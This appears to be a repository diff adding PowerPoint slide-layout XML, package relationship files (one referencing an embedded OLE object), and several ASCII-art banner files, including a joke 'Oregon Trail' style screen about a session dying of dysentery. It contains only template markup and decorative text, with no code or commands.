<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="titleOnly" preserve="1"><p:cSld name="Title Only"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Date Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Footer Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Slide Number Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="blank" preserve="1"><p:cSld name="Blank"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Date Placeholder 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Footer Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Slide Number Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="objTx" preserve="1"><p:cSld name="Content with Caption"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="273050"/><a:ext cx="3008313" cy="1162050"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="2000" b="1"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="3575050" y="273050"/><a:ext cx="5111750" cy="5853113"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="3200"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2800"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2400"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="2000"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="2000"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="2000"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="2000"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="2000"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="2000"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Text Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="1435100"/><a:ext cx="3008313" cy="4691063"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="1400"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1200"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1000"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="picTx" preserve="1"><p:cSld name="Picture with Caption"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="4800600"/><a:ext cx="5486400" cy="566738"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="2000" b="1"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Picture Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="pic" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="612775"/><a:ext cx="5486400" cy="4114800"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="3200"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="2800"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="2400"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl9pPr></a:lstStyle><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Text Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="5367338"/><a:ext cx="5486400" cy="804862"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="1400"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1200"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1000"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>#</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/></Relationships>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.wmf"/></Relationships>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}"/>

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:viewPr xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:normalViewPr><p:restoredLeft sz="15620"/><p:restoredTop sz="94660"/></p:normalViewPr><p:slideViewPr><p:cSldViewPr><p:cViewPr varScale="1"><p:scale><a:sx n="57" d="100"/><a:sy n="57" d="100"/></p:scale><p:origin x="-1242" y="-522"/></p:cViewPr><p:guideLst><p:guide orient="horz" pos="2160"/><p:guide pos="2880"/></p:guideLst></p:cSldViewPr></p:slideViewPr><p:notesTextViewPr><p:cViewPr><p:scale><a:sx n="100" d="100"/><a:sy n="100" d="100"/></p:scale><p:origin x="0" y="0"/></p:cViewPr></p:notesTextViewPr><p:gridSpacing cx="76200" cy="76200"/></p:viewPr>

File diff suppressed because one or more lines are too long

34
data/logos/gargoyle.hwtxt Normal file
View File

@ -0,0 +1,34 @@
, ,
\'. .'/
),\ /,(
/__\'. .'/__\
\ `'.'-.__ __.-'.'` /
`) `'-. \ / .-'` ('
/ _.--'\ '. , , .' /'--._ \
|-'` '. '-.__ / \ / \ __.-' .' `'-|
\ _.`'-.,_'-.|/\ \ _,_ / /\|.-'_,.-'`._ /
`\ .-' /'-.|| \ |.-" "-.| / ||.-'\ '-. /`
)-'` .' :|| / -.\\ //.- \ ||: '. `'-(
/ .' / \\_ | /o`^'o\ | _// \ '. \
\ .-' .' `--| `"/ \"` |--` '. '-. /
`) _.' .' .--.; |\__"__/| ;.--. '. '._ ('
/_.' .-' _.-' \\ \/^\/ // `-._ '-. '._\
\ .'`_.--' \\ // `--._`'. /
'-._' /` _ \\-.-// _ `\ '_.-'
`< _,..--''`| \`"`/ |`''--..,_ >`
_\ ``--..__ \ `'` / __..--`` /_
/ '-.__ ``'-; / \ ;-'`` __.-' \
| _ ``''--.. \'-' | '-'/ ..--''`` _ |
\ '-. / |/--|--\| \ .-' /
'-._ '-._ / |---|---| \ _.-' _.-'
`'-._ '/ / / /---|---\ \ \ \' _.-'`
'-./ / / / \`---`/ \ \ \ \.-'
`)` ` /'---'\ ` `(`
jgs /` | | `\
/ / | | | | \ \
.--' / | '. .' | \ '--.
/_____/| / \._\ /_./ \ |\_____\
(/ (/' \) (/ `\) \)

37
data/logos/ghost01.hwtxt Normal file
View File

@ -0,0 +1,37 @@
.,,cccd$$$$$$$$$$$ccc,
,cc$$$$$$$$$$$$$$$$$$$$$$$$$cc,
,d$$$$$$$$$$$$$$$$"J$$$$$$$$$$$$$$c,
d$$$$$$$$$$$$$$$$$$,$" ,,`?$$$$$$$$$$$$L
,$$$$$$$$$$$$$$$$$$$$$',J$$$$$$$$$$$$$$$$$b
,$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$i `$h
$$$$$$$$$$$$$$$$$$$$$$$$$P' "$$$$$$$$$$$h $$
;$$$$$$$$$$$$$$$$$$$$$$$$F,$$$h,?$$$$$$$$$$h$F
`$$$$$$$$$$$$$$$$$$$$$$$F:??$$$:)$$$$P",. $$F
?$$$$$$$$$$$$$$$$$$$$$$( `$$ J$$F"d$$F,$F
?$$$$$$$$$$$$$$$$$$$$$h, :P'J$$F ,$F,$"
?$$$$$$$$$$$$$$$$$$$$$$$ccd$$`$h, ",d$
"$$$$$$$$$$$$$$$$$$$$$$$$",cdc $$$$"
,uu, `?$$$$$$$$$$$$$$$$$$$$$$$$$$$c$$$$h
.,d$$$$$$$cc, `$$$$$$$$$$$$$$$$??$$$$$$$$$$$$$$$,
,d$$$$$$$$$$$$$$$bcccc,,??$$$$$$ccf `"??$$$$??$$$$$$$
d$$$$$$$$$$$$$$$$$$$$$$$$$h`?$$$$$$h`:... d$$$$$$$$P
d$$$$$$$$$$$$$$$$$$$$$$$$$$$$`$$$$$$$hc,,cd$$$$$$$$P"
=$$?$$$$$$$$P' ?$$$$$$$$$$$$$$$$$;$$$$$$$$$???????",,
=$$$$$$F `"?????$$$$$$$$$$$$$$$$$$$$$$$$$$$$$bc
d$$F"?$$k ,ccc$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$i
. ,ccc$$c`""u$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$P",$$$$$$$$$$$$h
,d$$$L J$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" `""$$$??$$$$$$$
,d$$$$$$c,"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F `?J$$$$$$$'
,$$$$$$$$$$h`$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F ?$$$$$$$P""=,
,$$$F?$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$F 3$$$$II"?$h,
$$$$$`$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$P" ;$$$??$$$,"?"
$$$$F ?$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$P",z' 3$$h ?$F
`?$$$$$$$$$$$$$$$??$$$$$$$$$PF"',d$P" "?$F
""""""" ,z$$$$$$$$$$$$$P
J$$$$$$$$$$$$$$F
,$$$$$$$$$$$$$$F
:$$$$$c?$$$$PF'
`$$$$$$$P
`?$$$$F

21
data/logos/json01.hwtxt Normal file
View File

@ -0,0 +1,21 @@
aa@@@@@@@@@@@@@aa
a@@@@@@@@@@@@@@@@@@@@@a
a@@@@@@@@@@@@@@@@@@@@@@@@@a
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@~~~~@@@@@@@@@~~~~@@@@@@@
@@@@@@ @@@@@@@ @@@@@@
@@@@@@@aaaa@@@@@@@@@aaaa@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
`@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
@@@@@@@@~@@@~@@@~@@@~@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@~@@@~@@@~@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@~@@@~@@@@@@@@
`@@@@@@@@@@@@@@@@@'
~~@@@@@@@~~

View File

@ -0,0 +1,41 @@
%clr
%mag .~+P``````-o+:. -o+:.%clr
%mag.+oooyysyyssyyssyddh++os-````` ``````````````` `%clr
%mag+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o%clr
%mag++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy%clr
%mag--.` .-.-...-////+++++++++++++++////////~~//////++++++++++++///%clr
%mag `...............` `...-/////...`%clr
%clr
%clr
%whi .::::::::::-. .::::::-%clr
%whi .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo%clr
%whi :Nm-/NMMMMMMMMMMMMM%blu$$%whiNMMMMm%blu&&%whiMMMMMMMMMMMMMMy%clr
%whi .sm/`-yMMMMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMMMMh`%clr
%whi -Nd` :MMMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMMMh`%clr
%whi -Nh` .yMMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMMm/%clr
%whi `oo/``-hd: `` .sNd :MMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMm/%clr
%whi .yNmMMh%dred//%whi+syysso-`````` -mh` :MMMMMMMMMM%blu$$%whiMMMMMN%blu&&%whiMMMMMMMMMMd%clr
%whi .shMMMMN%dred//%whidmNMMMMMMMMMMMMs` `:```-o++++oooo+:/ooooo+:+o+++oooo++/%clr
%whi `///omh%dred//%whidMMMMMMMMMMMMMMMN/%dred:::::/+ooso--/ydh//+s+/ossssso:--syN///os:%clr
%whi /MMMMMMMMMMMMMMMMMMd. %dred`/++-.-yy/%whi...%dredosydh/-+oo:-`o//%whi...%dredoyodh+%clr
%whi -hMMmssddd+:dMMmNMMh. %dred`.-=mmk.%whi//^^^\\%dred.^^`:++:^^o:%whi//^^^\\%dred`::%clr
%whi .sMMmo. -dMd--:mN/` %whi||--X--||%clr %dred%whi||--X--||%clr
%whi........../yddy/:...+hmo-...hdd:............%whi\\=v=//%clr............%dred%whi\\=v=//%clr.........
%grn================================================================================%clr
%grn=====================%whi+--------------------------------+%grn=========================%clr
%grn=====================%whi| Session one died of dysentery. |%grn=========================%clr
%grn=====================%whi+--------------------------------+%grn=========================%clr
%grn================================================================================%clr
%clr
%clr %grnPress ENTER to size up the situation%clr
%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%whi%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%clr
%clr
%clr %whiPress SPACE BAR to continue%clr
%clr

29
data/logos/mummy.hwtxt Normal file
View File

@ -0,0 +1,29 @@
